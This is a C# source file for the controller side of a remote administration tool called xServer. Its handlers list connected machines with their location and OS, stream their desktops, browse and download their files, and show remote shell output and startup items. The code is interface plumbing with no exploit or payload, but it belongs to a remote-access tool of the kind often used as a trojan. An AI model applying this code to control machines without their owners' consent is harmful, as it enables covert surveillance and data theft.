using System; using System.Drawing; using System.IO; using System.Threading; using System.Windows.Forms; using xServer.Core.Extensions; using xServer.Core.Helper; using xServer.Core.Packets.ClientPackets; using xServer.Forms; using xServer.Settings; namespace xServer.Core.Commands { public static class CommandHandler { private const string DELIMITER = "$E$"; public static void HandleInitialize(Client client, Initialize packet) { if (client.EndPoint.Address.ToString() == "") return; FrmMain.Instance.Invoke((MethodInvoker)delegate { try { client.Value.Version = packet.Version; client.Value.OperatingSystem = packet.OperatingSystem; client.Value.AccountType = packet.AccountType; client.Value.Country = packet.Country; client.Value.CountryCode = packet.CountryCode; client.Value.Region = packet.Region; client.Value.City = packet.City; client.Value.Id = packet.Id; if (!FrmMain.Instance.ListenServer.AllTimeConnectedClients.ContainsKey(client.Value.Id)) FrmMain.Instance.ListenServer.AllTimeConnectedClients.Add(client.Value.Id, DateTime.Now); FrmMain.Instance.ListenServer.ConnectedClients++; FrmMain.Instance.UpdateWindowTitle(FrmMain.Instance.ListenServer.ConnectedClients, FrmMain.Instance.lstClients.SelectedItems.Count); string country = string.Format("{0} [{1}]", client.Value.Country, client.Value.CountryCode); // this " " leaves some space between the flag-icon and the IP ListViewItem lvi = new ListViewItem(new string[] { " " + client.EndPoint.Address.ToString(), client.EndPoint.Port.ToString(), client.Value.Version, "Connected", "Active", country, client.Value.OperatingSystem, client.Value.AccountType }) { Tag = client, ImageIndex = packet.ImageIndex }; FrmMain.Instance.lstClients.Items.Add(lvi); if (XMLSettings.ShowPopup) ShowPopup(client); client.Value.IsAuthenticated = true; } catch { } }); } private static void ShowPopup(Client c) { FrmMain.Instance.nIcon.ShowBalloonTip(30, string.Format("Client connected from {0}!", c.Value.Country), string.Format("IP Address: {0}\nOperating System: {1}", c.EndPoint.Address.ToString(), c.Value.OperatingSystem), ToolTipIcon.Info); } public static void HandleStatus(Client client, Status packet) { new Thread(() => { FrmMain.Instance.Invoke((MethodInvoker) delegate { foreach (ListViewItem lvi in FrmMain.Instance.lstClients.Items) { Client c = (Client) lvi.Tag; if (client == c) { lvi.SubItems[3].Text = packet.Message; break; } } }); }).Start(); } public static void HandleUserStatus(Client client, UserStatus packet) { new Thread(() => { FrmMain.Instance.Invoke((MethodInvoker)delegate { foreach (ListViewItem lvi in FrmMain.Instance.lstClients.Items) { Client c = (Client)lvi.Tag; if (client == c) { lvi.SubItems[4].Text = packet.Message; break; } } }); }).Start(); } public static void HandleRemoteDesktopResponse(Client client, DesktopResponse packet) { if (client.Value.FrmRdp == null) return; // we can not dispose all bitmaps here, cause they are later used again in `client.Value.LastDesktop` if (client.Value.LastDesktop == null) { client.Value.StreamCodec = new UnsafeStreamCodec(); if (client.Value.LastQuality < 0) client.Value.LastQuality = packet.Quality; using (MemoryStream ms = new MemoryStream(packet.Image)) { Bitmap newScreen = client.Value.StreamCodec.DecodeData(ms); client.Value.LastDesktop = newScreen; try { client.Value.FrmRdp.Invoke((MethodInvoker)delegate { client.Value.FrmRdp.picDesktop.Image = (Bitmap)newScreen.Clone(); }); } catch { } newScreen = null; } } else { using (MemoryStream ms = new MemoryStream(packet.Image)) { lock (client.Value.StreamCodec) { if (client.Value.LastQuality != packet.Quality) { client.Value.StreamCodec = new UnsafeStreamCodec(); client.Value.LastQuality = packet.Quality; } Bitmap newScreen = client.Value.StreamCodec.DecodeData(ms); client.Value.LastDesktop = newScreen; try { client.Value.FrmRdp.Invoke((MethodInvoker)delegate { client.Value.FrmRdp.picDesktop.Image = (Bitmap)newScreen.Clone(); }); } catch { } newScreen = null; } } } packet.Image = null; client.Value.LastDesktopSeen = true; } public static void HandleGetProcessesResponse(Client client, GetProcessesResponse packet) { if (client.Value.FrmTm == null) return; client.Value.FrmTm.Invoke((MethodInvoker)delegate { client.Value.FrmTm.lstTasks.Items.Clear(); }); new Thread(() => { for (int i = 0; i < packet.Processes.Length; i++) { if (packet.IDs[i] != 0 && packet.Processes[i] != "System.exe") { ListViewItem lvi = new ListViewItem(new string[] { packet.Processes[i], packet.IDs[i].ToString(), packet.Titles[i] }); try { client.Value.FrmTm.Invoke((MethodInvoker)delegate { client.Value.FrmTm.lstTasks.Items.Add(lvi); }); } catch { break; } } } }).Start(); } public static void HandleDrivesResponse(Client client, DrivesResponse packet) { if (client.Value.FrmFm == null) return; client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.cmbDrives.Items.Clear(); client.Value.FrmFm.cmbDrives.Items.AddRange(packet.Drives); client.Value.FrmFm.cmbDrives.SelectedIndex = 0; }); } public static void HandleDirectoryResponse(Client client, DirectoryResponse packet) { if (client.Value.FrmFm == null) return; client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstDirectory.Items.Clear(); }); new Thread(() => { ListViewItem lviBack = new ListViewItem(new string[] {"..", "", "Directory"}) { Tag = "dir", ImageIndex = 0 }; client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstDirectory.Items.Add(lviBack); }); if (packet.Folders.Length != 0) { for (int i = 0; i < packet.Folders.Length; i++) { if (packet.Folders[i] != DELIMITER) { ListViewItem lvi = new ListViewItem(new string[] {packet.Folders[i], "", "Directory"}) { Tag = "dir", ImageIndex = 1 }; try { client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstDirectory.Items.Add(lvi); }); } catch { break; } } } } if (packet.Files.Length != 0) { for (int i = 0; i < packet.Files.Length; i++) { if (packet.Files[i] != DELIMITER) { ListViewItem lvi = new ListViewItem(new string[] {packet.Files[i], Helper.Helper.GetFileSize(packet.FilesSize[i]), "File"}) { Tag = "file", ImageIndex = Helper.Helper.GetFileIcon(Path.GetExtension(packet.Files[i])) }; try { client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstDirectory.Items.Add(lvi); }); } catch { break; } } } } client.Value.LastDirectorySeen = true; }).Start(); } public static void HandleDownloadFileResponse(Client client, DownloadFileResponse packet) { string downloadPath = Path.Combine(Application.StartupPath, "Clients\\" + client.EndPoint.Address.ToString()); if (!Directory.Exists(downloadPath)) Directory.CreateDirectory(downloadPath); downloadPath = Path.Combine(downloadPath, packet.Filename); bool Continue = true; if (packet.CurrentBlock == 0 && File.Exists(downloadPath)) if (MessageBox.Show(string.Format("The file '{0}' already exists!\nOverwrite it?", packet.Filename), "Overwrite Confirmation", MessageBoxButtons.YesNo, MessageBoxIcon.Question) != DialogResult.Yes) Continue = false; if (client.Value.FrmFm == null) { new Packets.ServerPackets.DownloadFileCanceled(packet.ID).Execute(client); MessageBox.Show("Please keep the File Manager open.\n\nWarning: Download aborted", "Download aborted", MessageBoxButtons.OK, MessageBoxIcon.Warning); return; } int index = 0; try { client.Value.FrmFm.Invoke((MethodInvoker)delegate { foreach (ListViewItem lvi in client.Value.FrmFm.lstTransfers.Items) { if (packet.ID.ToString() == lvi.SubItems[0].Text) { index = lvi.Index; break; } } }); } catch { return; } if (Continue) { if (!string.IsNullOrEmpty(packet.CustomMessage)) { client.Value.FrmFm.Invoke((MethodInvoker) delegate { client.Value.FrmFm.lstTransfers.Items[index].SubItems[1].Text = packet.CustomMessage; client.Value.FrmFm.lstTransfers.Items[index].ImageIndex = 0; }); return; } FileSplit destFile = new FileSplit(downloadPath); if (!destFile.AppendBlock(packet.Block, packet.CurrentBlock)) { client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstTransfers.Items[index].SubItems[1].Text = destFile.LastError; client.Value.FrmFm.lstTransfers.Items[index].ImageIndex = 0; }); return; } decimal progress = Math.Round((decimal)((double)(packet.CurrentBlock + 1) / (double)packet.MaxBlocks * 100.0), 2); client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstTransfers.Items[index].SubItems[1].Text = string.Format("Downloading...({0}%)", progress); }); if ((packet.CurrentBlock + 1) == packet.MaxBlocks) { client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstTransfers.Items[index].SubItems[1].Text = "Completed"; client.Value.FrmFm.lstTransfers.Items[index].ImageIndex = 1; }); } } else { client.Value.FrmFm.Invoke((MethodInvoker)delegate { client.Value.FrmFm.lstTransfers.Items[index].SubItems[1].Text = "Canceled"; client.Value.FrmFm.lstTransfers.Items[index].ImageIndex = 0; }); } } public static void HandleGetSystemInfoResponse(Client client, GetSystemInfoResponse packet) { if (client.Value.FrmSi == null) return; ListViewItem[] lviCollection = new ListViewItem[packet.SystemInfos.Length / 2]; int j = 0; for (int i = 0; i < packet.SystemInfos.Length; i+= 2) { if (packet.SystemInfos[i] != null && packet.SystemInfos[i + 1] != null) { lviCollection[j] = new ListViewItem(new string[] { packet.SystemInfos[i], packet.SystemInfos[i + 1] }); j++; } } try { client.Value.FrmSi.Invoke((MethodInvoker)delegate { client.Value.FrmSi.lstSystem.Items.RemoveAt(2); // Loading... Information foreach(var lviItem in lviCollection) { if (lviItem != null) client.Value.FrmSi.lstSystem.Items.Add(lviItem); } ListViewExtensions.AutosizeColumns(client.Value.FrmSi.lstSystem); }); } catch { } } public static void HandleMonitorsResponse(Client client, MonitorsResponse packet) { if (client.Value.FrmRdp == null) return; try { client.Value.FrmRdp.Invoke((MethodInvoker)delegate { for (int i = 0; i < packet.Number; i++) client.Value.FrmRdp.cbMonitors.Items.Add(string.Format("Monitor {0}", i + 1)); client.Value.FrmRdp.cbMonitors.SelectedIndex = 0; }); } catch { } } public static void HandleShellCommandResponse(Client client, ShellCommandResponse packet) { if (client.Value.FrmRs == null) return; try { client.Value.FrmRs.Invoke((MethodInvoker)delegate { client.Value.FrmRs.txtConsoleOutput.Text += packet.Output; }); } catch { } } public static void HandleGetStartupItemsResponse(Client client, GetStartupItemsResponse packet) { if (client.Value.FrmStm == null) return; try { client.Value.FrmStm.Invoke((MethodInvoker)delegate { foreach (var pair in packet.StartupItems) { var temp = pair.Key.Split(new string[] { "||" }, StringSplitOptions.None); var l = new ListViewItem(temp) {Group = client.Value.FrmStm.lstStartupItems.Groups[pair.Value], Tag = pair.Value}; client.Value.FrmStm.lstStartupItems.Items.Add(l); } }); } catch { } } } }